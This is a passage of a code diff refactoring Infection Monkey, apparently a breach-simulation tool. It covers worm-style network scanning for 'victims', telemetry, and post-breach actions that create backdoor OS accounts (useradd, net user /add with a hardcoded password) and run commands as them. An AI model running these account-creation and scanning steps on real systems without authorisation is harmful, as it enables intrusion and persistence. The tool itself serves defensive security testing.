+        self.assertEqual(len(victims), 1)
+        self.assertEqual(victims[0].domain_name, '')

@@ -7,7 +7,9 @@ import time
 from six.moves import xrange

 import infection_monkey.tunnel as tunnel
-import infection_monkey.utils as utils
+from infection_monkey.utils.environment import is_windows_os
+from infection_monkey.utils.monkey_dir import create_monkey_dir, get_monkey_dir_path, remove_monkey_dir
+from infection_monkey.utils.monkey_log_path import get_monkey_log_path
 from infection_monkey.config import WormConfiguration
 from infection_monkey.control import ControlClient
 from infection_monkey.model import DELAY_DELETE_CMD

@@ -24,9 +26,10 @@ from infection_monkey.telemetry.trace_telem import TraceTelem
 from infection_monkey.telemetry.tunnel_telem import TunnelTelem
 from infection_monkey.windows_upgrader import WindowsUpgrader
 from infection_monkey.post_breach.post_breach_handler import PostBreach
-from common.utils.attack_utils import ScanStatus
 from infection_monkey.exploit.tools.helpers import get_interface_to_target
 from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError
+from infection_monkey.telemetry.attack.t1106_telem import T1106Telem
+from common.utils.attack_utils import ScanStatus, UsageEnum

 __author__ = 'itamar'

@@ -93,7 +96,7 @@ class InfectionMonkey(object):
         fbts

         # Create a dir for monkey files if there isn't one
-        utils.create_monkey_dir()
+        create_monkey_dir()

         if WindowsUpgrader.should_upgrade():
             self._upgrading_to_64 = True

@@ -105,6 +108,9 @@ class InfectionMonkey(object):
         ControlClient.wakeup(parent=self._parent)
         ControlClient.load_control_config()

+        if is_windows_os():
+            T1106Telem(ScanStatus.USED, UsageEnum.SINGLETON_WINAPI).send()
+
         if not WormConfiguration.alive:
             LOG.info("Marked not alive from configuration")
             return

@@ -116,7 +122,7 @@ class InfectionMonkey(object):
         if monkey_tunnel:
             monkey_tunnel.start()

-        StateTelem(False).send()
+        StateTelem(is_done=False).send()
         TunnelTelem().send()

         if WormConfiguration.collect_system_info:

@@ -228,7 +234,7 @@ class InfectionMonkey(object):
             InfectionMonkey.close_tunnel()
             firewall.close()
         else:
-            StateTelem(True).send()  # Signal the server (before closing the tunnel)
+            StateTelem(is_done=True).send()  # Signal the server (before closing the tunnel)
             InfectionMonkey.close_tunnel()
             firewall.close()
         if WormConfiguration.send_log_to_server:

@@ -247,8 +253,8 @@ class InfectionMonkey(object):

     @staticmethod
     def self_delete():
-        status = ScanStatus.USED if utils.remove_monkey_dir() else ScanStatus.SCANNED
-        T1107Telem(status, utils.get_monkey_dir_path()).send()
+        status = ScanStatus.USED if remove_monkey_dir() else ScanStatus.SCANNED
+        T1107Telem(status, get_monkey_dir_path()).send()

         if WormConfiguration.self_delete_in_cleanup \
                 and -1 == sys.executable.find('python'):

@@ -272,7 +278,7 @@ class InfectionMonkey(object):
             T1107Telem(status, sys.executable).send()

     def send_log(self):
-        monkey_log_path = utils.get_monkey_log_path()
+        monkey_log_path = get_monkey_log_path()
         if os.path.exists(monkey_log_path):
             with open(monkey_log_path, 'r') as f:
                 log = f.read()

@@ -6,11 +6,11 @@ import requests
 from requests.exceptions import Timeout, ConnectionError

 import infection_monkey.config
+from common.data.network_consts import ES_SERVICE
 from infection_monkey.model.host import VictimHost
 from infection_monkey.network import HostFinger

 ES_PORT = 9200
-ES_SERVICE = 'elastic-search-9200'
 ES_HTTP_TIMEOUT = 5
 LOG = logging.getLogger(__name__)
 __author__ = 'danielg'

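Note (not part of the commit): the net effect of this hunk and the matching exploiter hunk earlier is that both modules now read the service name from the shared constants module added in this commit rather than from the fingerprinter. A minimal illustration, assuming the package layout implied by the imports:

    from common.data.network_consts import ES_SERVICE
    from infection_monkey.network.elasticfinger import ES_PORT

    # The fingerprinter keeps the port; the service label now lives in common.data.
    print(ES_PORT, ES_SERVICE)  # 9200 elastic-search-9200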
@@ -1,28 +1,33 @@
 import time
+import logging

-from common.network.network_range import *
+from common.network.network_range import NetworkRange
 from infection_monkey.config import WormConfiguration
+from infection_monkey.model.victim_host_generator import VictimHostGenerator
 from infection_monkey.network.info import local_ips, get_interfaces_ranges
-from infection_monkey.model import VictimHost
 from infection_monkey.network import TcpScanner, PingScanner
+from infection_monkey.utils import is_windows_os

-__author__ = 'itamar'
+if is_windows_os():
+    from multiprocessing.dummy import Pool
+else:
+    from multiprocessing import Pool

 LOG = logging.getLogger(__name__)

-SCAN_DELAY = 0
+ITERATION_BLOCK_SIZE = 5


 class NetworkScanner(object):
     def __init__(self):
         self._ip_addresses = None
         self._ranges = None
+        self.scanners = [TcpScanner(), PingScanner()]

     def initialize(self):
         """
         Set up scanning.
         based on configuration: scans local network and/or scans fixed list of IPs/subnets.
-        :return:
         """
         # get local ip addresses
         self._ip_addresses = local_ips()

@@ -68,49 +73,35 @@ class NetworkScanner(object):
         :param stop_callback: A callback to check at any point if we should stop scanning
         :return: yields a sequence of VictimHost instances
         """
+        # We currently use the ITERATION_BLOCK_SIZE as the pool size, however, this may not be the best decision
+        # However, the decision what ITERATION_BLOCK_SIZE also requires balancing network usage (pps and bw)
+        # Because we are using this to spread out IO heavy tasks, we can probably go a lot higher than CPU core size
+        # But again, balance
+        pool = Pool(ITERATION_BLOCK_SIZE)
+        victim_generator = VictimHostGenerator(self._ranges, WormConfiguration.blocked_ips, local_ips())

-        TCPscan = TcpScanner()
-        Pinger = PingScanner()
         victims_count = 0
-        for net_range in self._ranges:
-            LOG.debug("Scanning for potential victims in the network %r", net_range)
-            for ip_addr in net_range:
-                if hasattr(net_range, 'domain_name'):
-                    victim = VictimHost(ip_addr, net_range.domain_name)
-                else:
-                    victim = VictimHost(ip_addr)
-                if stop_callback and stop_callback():
-                    LOG.debug("Got stop signal")
-                    break
+        for victim_chunk in victim_generator.generate_victims(ITERATION_BLOCK_SIZE):
+            LOG.debug("Scanning for potential victims in chunk %r", victim_chunk)
+
+            # check before running scans
+            if stop_callback and stop_callback():
+                LOG.debug("Got stop signal")
+                return

-                # skip self IP address
-                if victim.ip_addr in self._ip_addresses:
-                    continue
+            results = pool.map(self.scan_machine, victim_chunk)
+            resulting_victims = filter(lambda x: x is not None, results)
+            for victim in resulting_victims:
+                LOG.debug("Found potential victim: %r", victim)
+                victims_count += 1
+                yield victim

-                # skip IPs marked as blocked
-                if victim.ip_addr in WormConfiguration.blocked_ips:
-                    LOG.info("Skipping %s due to blacklist" % victim)
-                    continue
-
-                LOG.debug("Scanning %r...", victim)
-                pingAlive = Pinger.is_host_alive(victim)
-                tcpAlive = TCPscan.is_host_alive(victim)
-
-                # if scanner detect machine is up, add it to victims list
-                if pingAlive or tcpAlive:
-                    LOG.debug("Found potential victim: %r", victim)
-                    victims_count += 1
-                    yield victim
-
-                    if victims_count >= max_find:
-                        LOG.debug("Found max needed victims (%d), stopping scan", max_find)
-                        break
-
-                if WormConfiguration.tcp_scan_interval:
-                    # time.sleep uses seconds, while config is in milliseconds
-                    time.sleep(WormConfiguration.tcp_scan_interval/float(1000))
+            if victims_count >= max_find:
+                LOG.debug("Found max needed victims (%d), stopping scan", max_find)
+                return
+            if WormConfiguration.tcp_scan_interval:
+                # time.sleep uses seconds, while config is in milliseconds
+                time.sleep(WormConfiguration.tcp_scan_interval / float(1000))

     @staticmethod
     def _is_any_ip_in_subnet(ip_addresses, subnet_str):

@@ -119,5 +110,18 @@ class NetworkScanner(object):
                 return True
         return False

+    def scan_machine(self, victim):
+        """
+        Scans specific machine using instance scanners
+        :param victim: VictimHost machine
+        :return: Victim or None if victim isn't alive
+        """
+        LOG.debug("Scanning target address: %r", victim)
+        if any([scanner.is_host_alive(victim) for scanner in self.scanners]):
+            LOG.debug("Found potential target_ip: %r", victim)
+            return victim
+        else:
+            return None
+
     def on_island(self, server):
         return bool([x for x in self._ip_addresses if x in server])

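Note: the sketch below is not from the commit; it only restates the chunk-and-pool pattern the new scan loop uses, with a stand-in aliveness check instead of the real TCP/ping scanners.

    from multiprocessing.dummy import Pool  # thread pool, like the Windows branch above

    ITERATION_BLOCK_SIZE = 5

    def scan_machine(victim):
        # Stand-in for NetworkScanner.scan_machine(); the real code asks TcpScanner/PingScanner.
        return victim if victim.endswith(".1") else None

    pool = Pool(ITERATION_BLOCK_SIZE)
    chunk = ["10.0.0.1", "10.0.0.2", "10.0.0.3", "10.0.0.4", "10.0.0.5"]
    alive = [v for v in pool.map(scan_machine, chunk) if v is not None]
    print(alive)  # -> ['10.0.0.1']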
@@ -10,7 +10,7 @@ import re
 from six.moves import range

 from infection_monkey.pyinstaller_utils import get_binary_file_path
-from infection_monkey.utils import is_64bit_python
+from infection_monkey.utils.environment import is_64bit_python

 DEFAULT_TIMEOUT = 10
 BANNER_READ = 1024

@@ -1,21 +1,16 @@
-import datetime
+from common.data.post_breach_consts import POST_BREACH_BACKDOOR_USER
 from infection_monkey.post_breach.pba import PBA
 from infection_monkey.config import WormConfiguration
+from infection_monkey.utils.users import get_commands_to_add_user

-__author__ = 'danielg'
-
-LINUX_COMMANDS = ['useradd', '-M', '--expiredate',
-                  datetime.datetime.today().strftime('%Y-%m-%d'), '--inactive', '0', '-c', 'MONKEY_USER',
-                  WormConfiguration.user_to_add]
-
-WINDOWS_COMMANDS = ['net', 'user', WormConfiguration.user_to_add,
-                    WormConfiguration.remote_user_pass,
-                    '/add', '/ACTIVE:NO']
-

 class BackdoorUser(PBA):
     def __init__(self):
-        super(BackdoorUser, self).__init__("Backdoor user",
-                                           linux_cmd=' '.join(LINUX_COMMANDS),
-                                           windows_cmd=WINDOWS_COMMANDS)
+        linux_cmds, windows_cmds = get_commands_to_add_user(
+            WormConfiguration.user_to_add,
+            WormConfiguration.remote_user_pass)
+        super(BackdoorUser, self).__init__(
+            POST_BREACH_BACKDOOR_USER,
+            linux_cmd=' '.join(linux_cmds),
+            windows_cmd=windows_cmds)

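Note: get_commands_to_add_user is not shown in this diff. Judging from the removed LINUX_COMMANDS / WINDOWS_COMMANDS lists above, a sketch of what it presumably returns (illustration only, not the actual helper):

    import datetime

    def get_commands_to_add_user(username, password):
        # Sketch based on the removed constants above; the real helper may differ.
        linux_cmds = ['useradd', '-M', '--expiredate',
                      datetime.datetime.today().strftime('%Y-%m-%d'),
                      '--inactive', '0', '-c', 'MONKEY_USER', username]
        windows_cmds = ['net', 'user', username, password, '/add', '/ACTIVE:NO']
        return linux_cmds, windows_cmds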
@ -0,0 +1,143 @@
|
||||||
|
import logging
|
||||||
|
import os
|
||||||
|
import random
|
||||||
|
import string
|
||||||
|
import subprocess
|
||||||
|
import time
|
||||||
|
|
||||||
|
import win32event
|
||||||
|
|
||||||
|
from infection_monkey.utils.windows.auto_new_user import AutoNewUser, NewUserError
|
||||||
|
from common.data.post_breach_consts import POST_BREACH_COMMUNICATE_AS_NEW_USER
|
||||||
|
from infection_monkey.post_breach.pba import PBA
|
||||||
|
from infection_monkey.telemetry.post_breach_telem import PostBreachTelem
|
||||||
|
from infection_monkey.utils.environment import is_windows_os
|
||||||
|
from infection_monkey.utils.linux.users import get_linux_commands_to_delete_user, get_linux_commands_to_add_user
|
||||||
|
|
||||||
|
PING_TEST_DOMAIN = "google.com"
|
||||||
|
|
||||||
|
PING_WAIT_TIMEOUT_IN_MILLISECONDS = 20 * 1000
|
||||||
|
|
||||||
|
CREATED_PROCESS_AS_USER_PING_SUCCESS_FORMAT = "Created process '{}' as user '{}', and successfully pinged."
|
||||||
|
CREATED_PROCESS_AS_USER_PING_FAILED_FORMAT = "Created process '{}' as user '{}', but failed to ping (exit status {})."
|
||||||
|
|
||||||
|
USERNAME = "somenewuser"
|
||||||
|
PASSWORD = "N3WPa55W0rD!1"
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class CommunicateAsNewUser(PBA):
|
||||||
|
"""
|
||||||
|
This PBA creates a new user, and then pings google as that user. This is used for a Zero Trust test of the People
|
||||||
|
pillar. See the relevant telemetry processing to see what findings are created.
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self):
|
||||||
|
super(CommunicateAsNewUser, self).__init__(name=POST_BREACH_COMMUNICATE_AS_NEW_USER)
|
||||||
|
|
||||||
|
def run(self):
|
||||||
|
username = CommunicateAsNewUser.get_random_new_user_name()
|
||||||
|
if is_windows_os():
|
||||||
|
self.communicate_as_new_user_windows(username)
|
||||||
|
else:
|
||||||
|
self.communicate_as_new_user_linux(username)
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_random_new_user_name():
|
||||||
|
return USERNAME + ''.join(random.choice(string.ascii_lowercase) for _ in range(5))
|
||||||
|
|
||||||
|
def communicate_as_new_user_linux(self, username):
|
||||||
|
try:
|
            # Add user + ping
            linux_cmds = get_linux_commands_to_add_user(username)
            commandline = "ping -c 1 {}".format(PING_TEST_DOMAIN)
            linux_cmds.extend([";", "sudo", "-u", username, commandline])
            final_command = ' '.join(linux_cmds)
            exit_status = os.system(final_command)
            self.send_ping_result_telemetry(exit_status, commandline, username)
            # Delete the user, async in case it gets stuck.
            _ = subprocess.Popen(
                get_linux_commands_to_delete_user(username), stderr=subprocess.STDOUT, shell=True)
            # Leaking the process on purpose - nothing we can do if it's stuck.
        except subprocess.CalledProcessError as e:
            PostBreachTelem(self, (e.output, False)).send()

    def communicate_as_new_user_windows(self, username):
        # Import these only on Windows, as they don't exist on Linux.
        import win32con
        import win32process
        import win32api

        try:
            with AutoNewUser(username, PASSWORD) as new_user:
                # Using os.path is OK, as this is on Windows for sure.
                ping_app_path = os.path.join(os.environ["WINDIR"], "system32", "PING.exe")
                if not os.path.exists(ping_app_path):
                    PostBreachTelem(self, ("{} not found.".format(ping_app_path), False)).send()
                    return  # Can't continue without ping.

                try:
                    # Open a process as that user:
                    # https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessasusera
                    commandline = "{} {} {} {}".format(ping_app_path, PING_TEST_DOMAIN, "-n", "1")
                    process_handle, thread_handle, _, _ = win32process.CreateProcessAsUser(
                        new_user.get_logon_handle(),  # A handle to the primary token that represents a user.
                        None,  # The name of the module to be executed.
                        commandline,  # The command line to be executed.
                        None,  # Process attributes
                        None,  # Thread attributes
                        True,  # Should inherit handles
                        win32con.NORMAL_PRIORITY_CLASS,  # The priority class and the creation of the process.
                        None,  # An environment block for the new process. If this parameter is NULL, the new process
                               # uses the environment of the calling process.
                        None,  # CWD. If this parameter is NULL, the new process has the same current drive and
                               # directory as the calling process.
                        win32process.STARTUPINFO()  # STARTUPINFO structure.
                        # https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/ns-processthreadsapi-startupinfoa
                    )

                    logger.debug(
                        "Waiting for ping process to finish. Timeout: {}ms".format(PING_WAIT_TIMEOUT_IN_MILLISECONDS))

                    # Ignore the return value; `GetExitCodeProcess` determines the state of the process later.
                    _ = win32event.WaitForSingleObject(  # Waits until the specified object is signaled, or the timeout elapses.
                        process_handle,  # Ping process handle
                        PING_WAIT_TIMEOUT_IN_MILLISECONDS  # Timeout in milliseconds
                    )

                    ping_exit_code = win32process.GetExitCodeProcess(process_handle)

                    self.send_ping_result_telemetry(ping_exit_code, commandline, username)
                except Exception as e:
                    # If this fails with error 1314, it may be possible to elevate the rights of the current user with
                    # the "Replace a process level token" right, using Local Security Policy editing.
                    PostBreachTelem(self, (
                        "Failed to open process as user {}. Error: {}".format(username, str(e)), False)).send()
                finally:
                    try:
                        win32api.CloseHandle(process_handle)
                        win32api.CloseHandle(thread_handle)
                    except Exception as err:
                        logger.error("Close handle error: " + str(err))
        except subprocess.CalledProcessError as err:
            PostBreachTelem(self, (
                "Couldn't create the user '{}'. Error output is: '{}'".format(username, str(err)),
                False)).send()
        except NewUserError as e:
            PostBreachTelem(self, (str(e), False)).send()

    def send_ping_result_telemetry(self, exit_status, commandline, username):
        """
        Parses the result of ping and sends telemetry accordingly.

        :param exit_status: In both Windows and Linux, a 0 exit code from ping indicates success.
        :param commandline: The exact command line which was executed, for reporting back.
        :param username: The username under which the command was executed, for reporting back.
        """
        if exit_status == 0:
            PostBreachTelem(self, (
                CREATED_PROCESS_AS_USER_PING_SUCCESS_FORMAT.format(commandline, username), True)).send()
        else:
            PostBreachTelem(self, (
                CREATED_PROCESS_AS_USER_PING_FAILED_FORMAT.format(commandline, username, exit_status), False)).send()

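For reference, a minimal standalone sketch of the exit-status convention the docstring above relies on; the non-zero values shown are only illustrative, not defined by this change:

def ping_succeeded(exit_status):
    # Both Linux ping and Windows PING.exe signal success with exit code 0;
    # any non-zero status (unreachable host, resolution failure, etc.) is a failure.
    return exit_status == 0

assert ping_succeeded(0)
assert not ping_succeeded(2)    # e.g. Linux ping error status
assert not ping_succeeded(127)  # illustrative "command not found" shell status
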
@@ -1,11 +1,12 @@
 import os
 import logging

-from infection_monkey.utils import is_windows_os
+from common.data.post_breach_consts import POST_BREACH_FILE_EXECUTION
+from infection_monkey.utils.environment import is_windows_os
 from infection_monkey.post_breach.pba import PBA
 from infection_monkey.control import ControlClient
 from infection_monkey.config import WormConfiguration
-from infection_monkey.utils import get_monkey_dir_path
+from infection_monkey.utils.monkey_dir import get_monkey_dir_path
 from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
 from common.utils.attack_utils import ScanStatus
 from infection_monkey.exploit.tools.helpers import get_interface_to_target

@@ -27,7 +28,7 @@ class UsersPBA(PBA):
     Defines user's configured post breach action.
     """
     def __init__(self):
-        super(UsersPBA, self).__init__("Custom post breach action")
+        super(UsersPBA, self).__init__(POST_BREACH_FILE_EXECUTION)
         self.filename = ''
         if not is_windows_os():
             # Add linux commands to PBA's

@@ -3,7 +3,7 @@ import subprocess

 from common.utils.attack_utils import ScanStatus
 from infection_monkey.telemetry.post_breach_telem import PostBreachTelem
-from infection_monkey.utils import is_windows_os
+from infection_monkey.utils.environment import is_windows_os
 from infection_monkey.config import WormConfiguration
 from infection_monkey.telemetry.attack.t1064_telem import T1064Telem

@@ -21,7 +21,8 @@ class PBA(object):
     def __init__(self, name="unknown", linux_cmd="", windows_cmd=""):
         """
         :param name: Name of post breach action.
-        :param command: Command that will be executed on breached machine
+        :param linux_cmd: Command that will be executed on the breached machine (Linux)
+        :param windows_cmd: Command that will be executed on the breached machine (Windows)
         """
         self.command = PBA.choose_command(linux_cmd, windows_cmd)
         self.name = name

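To make the constructor signature above concrete, a hedged sketch of a custom PBA subclass; the class name and echo commands are placeholders, not part of this change, and `PBA.choose_command` (shown in the diff) picks the Linux or Windows variant based on the running OS:

from infection_monkey.post_breach.pba import PBA

class DemoEchoPBA(PBA):
    # Placeholder action: the command strings below are illustrative only.
    def __init__(self):
        super(DemoEchoPBA, self).__init__(
            name="Demo echo action",
            linux_cmd="echo demo-linux",
            windows_cmd="echo demo-windows")
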
@@ -3,7 +3,7 @@ import inspect
 import importlib
 from infection_monkey.post_breach.pba import PBA
 from infection_monkey.post_breach.actions import get_pba_files
-from infection_monkey.utils import is_windows_os
+from infection_monkey.utils.environment import is_windows_os

 LOG = logging.getLogger(__name__)

@@ -25,8 +25,12 @@ class PostBreach(object):
         Executes all post breach actions.
         """
         for pba in self.pba_list:
-            pba.run()
-        LOG.info("Post breach actions executed")
+            try:
+                LOG.debug("Executing PBA: '{}'".format(pba.name))
+                pba.run()
+            except Exception as e:
+                LOG.error("PBA {} failed. Error info: {}".format(pba.name, e))
+        LOG.info("All PBAs executed. Total {} executed.".format(len(self.pba_list)))

     @staticmethod
     def config_to_pba_list():

@@ -45,7 +49,9 @@ class PostBreach(object):
             if ((m[1].__module__ == module.__name__) and issubclass(m[1], PBA))]
         # Get post breach action object from class
         for pba_class in pba_classes:
+            LOG.debug("Checking if should run PBA {}".format(pba_class.__name__))
             if pba_class.should_run(pba_class.__name__):
                 pba = pba_class()
                 pba_list.append(pba)
+                LOG.debug("Added PBA {} to PBA list".format(pba_class.__name__))
         return pba_list

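The intent of the new per-PBA try/except can be seen in a tiny self-contained sketch (names here are illustrative, not from the codebase): one failing action is logged and the rest still run.

import logging

logging.basicConfig(level=logging.DEBUG)
LOG = logging.getLogger("pba_demo")

def run_all(named_actions):
    # Each action runs inside its own try/except, mirroring the loop above.
    for name, action in named_actions:
        try:
            LOG.debug("Executing PBA: '{}'".format(name))
            action()
        except Exception as e:
            LOG.error("PBA {} failed. Error info: {}".format(name, e))
    LOG.info("All PBAs executed. Total {} executed.".format(len(named_actions)))

run_all([("ok", lambda: None), ("broken", lambda: 1 / 0), ("still runs", lambda: None)])
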
@@ -62,7 +62,7 @@ a. Build sambacry binaries yourself
 a.1. Install gcc-multilib if it's not installed
     sudo apt-get install gcc-multilib
 a.2. Build the binaries
-    cd [code location]/infection_monkey/monkey_utils/sambacry_monkey_runner
+    cd [code location]/infection_monkey/exploit/sambacry_monkey_runner
     ./build.sh

b. Download our pre-built sambacry binaries

@@ -4,8 +4,7 @@ import sys
 from abc import ABCMeta, abstractmethod

 from infection_monkey.config import WormConfiguration
-from infection_monkey.telemetry.attack.t1106_telem import T1106Telem
-from common.utils.attack_utils import ScanStatus, UsageEnum

 __author__ = 'itamar'

@@ -46,21 +45,13 @@ class WindowsSystemSingleton(_SystemSingleton):
                                                  ctypes.c_char_p(self._mutex_name))
         last_error = ctypes.windll.kernel32.GetLastError()

-        status = None
         if not handle:
             LOG.error("Cannot acquire system singleton %r, unknown error %d",
                       self._mutex_name, last_error)
-            status = ScanStatus.SCANNED
+            return False

         if winerror.ERROR_ALREADY_EXISTS == last_error:
-            status = ScanStatus.SCANNED
             LOG.debug("Cannot acquire system singleton %r, mutex already exist",
                       self._mutex_name)
-
-        if not status:
-            status = ScanStatus.USED
-        T1106Telem(status, UsageEnum.SINGLETON_WINAPI).send()
-        if status == ScanStatus.SCANNED:
             return False

         self._mutex_handle = handle

@@ -71,7 +62,6 @@ class WindowsSystemSingleton(_SystemSingleton):

     def unlock(self):
         assert self._mutex_handle is not None, "Singleton not locked"

         ctypes.windll.kernel32.CloseHandle(self._mutex_handle)
         self._mutex_handle = None

@@ -1,7 +1,11 @@
 import abc
+import json
+import logging

 from infection_monkey.control import ControlClient

+logger = logging.getLogger(__name__)
+
 __author__ = 'itay.mizeretz'


@@ -19,7 +23,9 @@ class BaseTelem(object):
         """
         Sends telemetry to island
         """
-        ControlClient.send_telemetry(self.telem_category, self.get_data())
+        data = self.get_data()
+        logger.debug("Sending {} telemetry. Data: {}".format(self.telem_category, json.dumps(data)))
+        ControlClient.send_telemetry(self.telem_category, data)

     @abc.abstractproperty
     def telem_category(self):

@@ -1,62 +0,0 @@
import os
import shutil
import struct
import sys
import tempfile

from infection_monkey.config import WormConfiguration


def get_monkey_log_path():
    return os.path.expandvars(WormConfiguration.monkey_log_path_windows) if sys.platform == "win32" \
        else WormConfiguration.monkey_log_path_linux


def get_dropper_log_path():
    return os.path.expandvars(WormConfiguration.dropper_log_path_windows) if sys.platform == "win32" \
        else WormConfiguration.dropper_log_path_linux


def is_64bit_windows_os():
    """
    Checks for 64 bit Windows OS using environment variables.
    """
    return 'PROGRAMFILES(X86)' in os.environ


def is_64bit_python():
    return struct.calcsize("P") == 8


def is_windows_os():
    return sys.platform.startswith("win")


def utf_to_ascii(string):
    # Converts utf string to ascii. Safe to use even if string is already ascii.
    udata = string.decode("utf-8")
    return udata.encode("ascii", "ignore")


def create_monkey_dir():
    """
    Creates directory for monkey and related files
    """
    if not os.path.exists(get_monkey_dir_path()):
        os.mkdir(get_monkey_dir_path())


def remove_monkey_dir():
    """
    Removes monkey's root directory
    :return True if removed without errors and False otherwise
    """
    try:
        shutil.rmtree(get_monkey_dir_path())
        return True
    except Exception:
        return False


def get_monkey_dir_path():
    return os.path.join(tempfile.gettempdir(), WormConfiguration.monkey_dir_name)

@@ -0,0 +1,18 @@
import os
import struct
import sys


def is_64bit_windows_os():
    """
    Checks for 64 bit Windows OS using environment variables.
    """
    return 'PROGRAMFILES(X86)' in os.environ


def is_64bit_python():
    return struct.calcsize("P") == 8


def is_windows_os():
    return sys.platform.startswith("win")

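A short sketch of how the relocated helpers are typically used to guard platform-specific work; the command strings below are assumptions for illustration only:

from infection_monkey.utils.environment import is_windows_os, is_64bit_python

if is_windows_os():
    ping_cmd = "ping -n 1 localhost"  # Windows ping count flag
else:
    ping_cmd = "ping -c 1 localhost"  # Linux ping count flag

print("64-bit Python: {}".format(is_64bit_python()))
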
@@ -0,0 +1,21 @@
import datetime


def get_linux_commands_to_add_user(username):
    return [
        'useradd',
        '-M',  # Do not create homedir
        '--expiredate',
        datetime.datetime.today().strftime('%Y-%m-%d'),
        '--inactive',
        '0',
        '-c',  # Comment
        'MONKEY_USER',  # Comment
        username]


def get_linux_commands_to_delete_user(username):
    return [
        'deluser',
        username
    ]

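A brief sketch of consuming these command lists the way the communicate-as-new-user PBA above does; the username is a placeholder:

from infection_monkey.utils.linux.users import (
    get_linux_commands_to_add_user, get_linux_commands_to_delete_user)

username = "demo_monkey_user"  # placeholder
# The caller joins the argv-style list into a single shell string before running it.
add_cmd = ' '.join(get_linux_commands_to_add_user(username))
del_cmd = ' '.join(get_linux_commands_to_delete_user(username))
print(add_cmd)
print(del_cmd)
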
@@ -0,0 +1,29 @@
import os
import shutil
import tempfile

from infection_monkey.config import WormConfiguration


def create_monkey_dir():
    """
    Creates directory for monkey and related files
    """
    if not os.path.exists(get_monkey_dir_path()):
        os.mkdir(get_monkey_dir_path())


def remove_monkey_dir():
    """
    Removes monkey's root directory
    :return True if removed without errors and False otherwise
    """
    try:
        shutil.rmtree(get_monkey_dir_path())
        return True
    except Exception:
        return False


def get_monkey_dir_path():
    return os.path.join(tempfile.gettempdir(), WormConfiguration.monkey_dir_name)

@@ -0,0 +1,14 @@
import os
import sys

from infection_monkey.config import WormConfiguration


def get_monkey_log_path():
    return os.path.expandvars(WormConfiguration.monkey_log_path_windows) if sys.platform == "win32" \
        else WormConfiguration.monkey_log_path_linux


def get_dropper_log_path():
    return os.path.expandvars(WormConfiguration.dropper_log_path_windows) if sys.platform == "win32" \
        else WormConfiguration.dropper_log_path_linux

@@ -0,0 +1,10 @@
from infection_monkey.utils.linux.users import get_linux_commands_to_add_user
from infection_monkey.utils.windows.users import get_windows_commands_to_add_user


def get_commands_to_add_user(username, password):
    linux_cmds = get_linux_commands_to_add_user(username)
    windows_cmds = get_windows_commands_to_add_user(username, password)
    return linux_cmds, windows_cmds

@@ -0,0 +1,69 @@
import logging
import subprocess

from infection_monkey.post_breach.actions.add_user import BackdoorUser
from infection_monkey.utils.windows.users import get_windows_commands_to_delete_user, get_windows_commands_to_add_user

logger = logging.getLogger(__name__)


class NewUserError(Exception):
    pass


class AutoNewUser(object):
    """
    RAII object to use for creating and using a new user in Windows. Use with `with`.
    User will be created when the instance is instantiated.
    User will log on at the start of the `with` scope.
    User will log off and get deleted at the end of said `with` scope.

    Example:
             # Created                       # Logged on
        with AutoNewUser("user", "pass") as new_user:
            ...
            ...
        # Logged off and deleted
        ...
    """
    def __init__(self, username, password):
        """
        Creates a user with the username + password.
        :raises: subprocess.CalledProcessError if failed to add the user.
        """
        self.username = username
        self.password = password

        windows_cmds = get_windows_commands_to_add_user(self.username, self.password, True)
        _ = subprocess.check_output(windows_cmds, stderr=subprocess.STDOUT, shell=True)

    def __enter__(self):
        # Import these only on Windows, as they don't exist on Linux.
        import win32security
        import win32con

        try:
            # Logon as the new user: https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonusera
            self.logon_handle = win32security.LogonUser(
                self.username,
                ".",  # Use current domain.
                self.password,
                win32con.LOGON32_LOGON_INTERACTIVE,  # Logon type - interactive (normal user).
                win32con.LOGON32_PROVIDER_DEFAULT)  # Which logon provider to use - whatever Windows offers.
        except Exception as err:
            raise NewUserError("Can't logon as {}. Error: {}".format(self.username, str(err)))
        return self

    def get_logon_handle(self):
        return self.logon_handle

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Logoff
        self.logon_handle.Close()

        # Try to delete user
        try:
            _ = subprocess.Popen(
                get_windows_commands_to_delete_user(self.username), stderr=subprocess.STDOUT, shell=True)
        except Exception as err:
            raise NewUserError("Can't delete user {}. Info: {}".format(self.username, err))

@@ -0,0 +1,18 @@
def get_windows_commands_to_add_user(username, password, should_be_active=False):
    windows_cmds = [
        'net',
        'user',
        username,
        password,
        '/add']
    if not should_be_active:
        windows_cmds.append('/ACTIVE:NO')
    return windows_cmds


def get_windows_commands_to_delete_user(username):
    return [
        'net',
        'user',
        username,
        '/delete']

@@ -10,7 +10,7 @@ from infection_monkey.config import WormConfiguration
 from infection_monkey.control import ControlClient
 from infection_monkey.exploit.tools.helpers import build_monkey_commandline_explicitly
 from infection_monkey.model import MONKEY_CMDLINE_WINDOWS
-from infection_monkey.utils import is_windows_os, is_64bit_windows_os, is_64bit_python
+from infection_monkey.utils.environment import is_windows_os, is_64bit_windows_os, is_64bit_python

 __author__ = 'itay.mizeretz'

@@ -23,7 +23,7 @@ from monkey_island.cc.resources.monkey_download import MonkeyDownload
 from monkey_island.cc.resources.netmap import NetMap
 from monkey_island.cc.resources.node import Node
 from monkey_island.cc.resources.remote_run import RemoteRun
-from monkey_island.cc.resources.report import Report
+from monkey_island.cc.resources.reporting.report import Report
 from monkey_island.cc.resources.root import Root
 from monkey_island.cc.resources.telemetry import Telemetry
 from monkey_island.cc.resources.telemetry_feed import TelemetryFeed

@@ -125,7 +125,13 @@ def init_api_resources(api):
     api.add_resource(NetMap, '/api/netmap', '/api/netmap/')
     api.add_resource(Edge, '/api/netmap/edge', '/api/netmap/edge/')
     api.add_resource(Node, '/api/netmap/node', '/api/netmap/node/')
-    api.add_resource(Report, '/api/report', '/api/report/')
+
+    # report_type: zero_trust or security
+    api.add_resource(
+        Report,
+        '/api/report/<string:report_type>',
+        '/api/report/<string:report_type>/<string:report_data>')
+
     api.add_resource(TelemetryFeed, '/api/telemetry-feed', '/api/telemetry-feed/')
     api.add_resource(Log, '/api/log', '/api/log/')
